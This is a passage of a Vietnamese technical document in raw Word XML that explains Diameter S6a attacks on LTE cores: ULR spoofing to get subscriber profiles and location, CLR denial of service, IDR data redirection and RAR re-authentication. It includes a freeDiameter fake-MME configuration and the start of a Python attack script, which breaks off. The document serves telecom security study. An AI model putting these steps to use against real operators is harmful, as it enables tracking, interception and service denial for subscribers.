        <w:t xml:space="preserve">Flags: R=Request, P=Proxiable, E=Error, T=Potentially re-transmitted</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="37" w:name="phân-tích-chi-tiết-từng-loại-tấn-công"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Phân Tích Chi Tiết Từng Loại Tấn Công</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="33" w:name="location-disclosure-ulr-spoofing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.1 Location Disclosure (ULR Spoofing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Update-Location-Request (ULR)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">là lệnh MME gửi đến HSS khi UE attach vào mạng, để thông báo MME đang phục vụ UE và yêu cầu hồ sơ dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tấn công:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attacker giả mạo là MME, gửi ULR đến HSS mục tiêu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker (giả MME) ──ULR──► HSS mục tiêu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  AVPs trong ULR:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    User-Name (IMSI): 452040123456789</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    RAT-Type: EUTRAN (1004)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ULR-Flags: Register-MME + Skip-Subscriber-Data</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Origin-Host: fake-mme.epc.mnc004.mcc452.3gppnetwork.org</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Origin-Realm: epc.mnc004.mcc452.3gppnetwork.org</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HSS phản hồi ULA (Update-Location-Answer):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Result-Code: DIAMETER_SUCCESS (2001)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Subscription-Data:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → MSISDN</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → Network-Access-Mode</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → Context-Identifier</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → PDN connectivity settings</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → Roaming restrictions</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → Operator-Determined-Barring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HSS không xác minh Origin-Host có thực sự là MME hợp lệ hay không → attacker nhận được toàn bộ hồ sơ dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="cancel-location-clr-dos-cho-thuê-bao"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.2 Cancel Location (CLR) – DoS cho Thuê Bao</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker ──CLR──► HSS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  CLR gửi đến HSS với IMSI mục tiêu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  HSS gửi CLR đến MME hiện tại của UE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  MME xóa ngữ cảnh UE, gửi Detach Request xuống UE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  UE bị buộc detach khỏi mạng → mất dịch vụ</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  UE phải re-attach → trong thời gian re-attach: no service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nếu attacker gửi CLR liên tục với tần suất cao hơn re-attach time →</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">permanent DoS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cho thuê bao mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="insert-subscriber-data-idr"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.3 Insert Subscriber Data (IDR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tương tự ISD trong SS7 MAP, IDR cho phép ghi đè hồ sơ dịch vụ trong HSS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker ──IDR──► MME (giả HSS)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  IDR payload:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Subscription-Data:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → AMBR: 0/0 (giới hạn băng thông về 0 → DoS dữ liệu)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → PDN-GW-Allocation-Type: DYNAMIC → chuyển hướng dữ liệu</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      → APN-Configuration: attacker APN</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="re-auth-request-rar-ép-xác-thực-lại"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.4 Re-Auth-Request (RAR) – Ép Xác Thực Lại</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker ──RAR──► MME (giả PCRF/HSS)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  MME buộc UE thực hiện EPS-AKA lại</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Trong quá trình xác thực lại: window để MITM KASME derivation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  (Lý thuyết; thực tế cần thêm điều kiện)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="đầu-vào"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4 Đầu Vào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Mô tả</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Diameter peer connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kết nối TCP/SCTP đến DEA/DRA liên mạng (port 3868)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Origin-Realm hợp lệ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Domain 3GPP của mạng giả mạo (vd:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">epc.mnc004.mcc452.3gppnetwork.org</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">IMSI mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Từ SS7 SRI hoặc IMSI catcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Application-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">S6a = 16777251 (3GPP TS 29.272)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Phần mềm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">freeDiameter, SigPloit Diameter module, jDiameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="đầu-ra"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.5 Đầu Ra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hồ sơ dịch vụ đầy đủ của thuê bao (MSISDN, APN, QoS profile, roaming config)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gián đoạn dịch vụ (CLR attack) – UE mất 10–60 giây dịch vụ mỗi lần bị cancel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chặn/chuyển hướng lưu lượng dữ liệu (IDR với APN giả)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vị trí (E-UTRAN Cell Global Identifier – ECGI, chính xác hơn SS7)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="42" w:name="công-cụ-chi-tiết-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.6 Công Cụ Chi Tiết</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="40" w:name="freediameter"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.6.1 freeDiameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Nguồn: freediameter.net (C, mã nguồn mở)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu trúc:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  freeDiameter/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── freeDiameterd          # Daemon chính</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── extensions/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │   ├── dict_3gpp2_*       # Dictionary các AVP 3GPP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │   ├── app_diameap        # EAP application</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │   └── dbg_msg_dumps      # PCAP export</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── include/freeDiameter/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình (freeDiameter.conf):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Identity = "fake-mme.epc.mnc004.mcc452.3gppnetwork.org";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Realm = "epc.mnc004.mcc452.3gppnetwork.org";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ConnectPeer = "dra.ims.mnc004.mcc452.3gppnetwork.org" {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ConnectTo = "10.0.0.2";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Port = 3868;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    TLS_Disabled;   # Nhiều triển khai thực tế tắt TLS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Tc = 30;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">};</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LoadExtension = "dbg_msg_dumps.fdx" : "0x8888";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">LoadExtension = "app_s6a.fdx";  # Custom extension tấn công S6a</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="Xa92771990c52167f9d15d0c89bb58423490b0e9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.6.2 Script Tấn Công ULR (Python + diameter library)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Diameter ULR Attack - Location Disclosure via S6a interface</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Minh họa học thuật, dựa trên RFC 6733 và 3GPP TS 29.272</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> socket</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Diameter AVP codes (3GPP TS 29.272)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_USER_NAME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IMSI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_SESSION_ID      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">263</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_ORIGIN_HOST     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">264</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_ORIGIN_REALM    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">296</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_DEST_REALM      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">283</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_DEST_HOST       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">293</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_AUTH_APP_ID     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">258</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">AVP_RESULT_CODE     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">268</w:t>
      </w:r>
      <w:r>
        <w:br/>
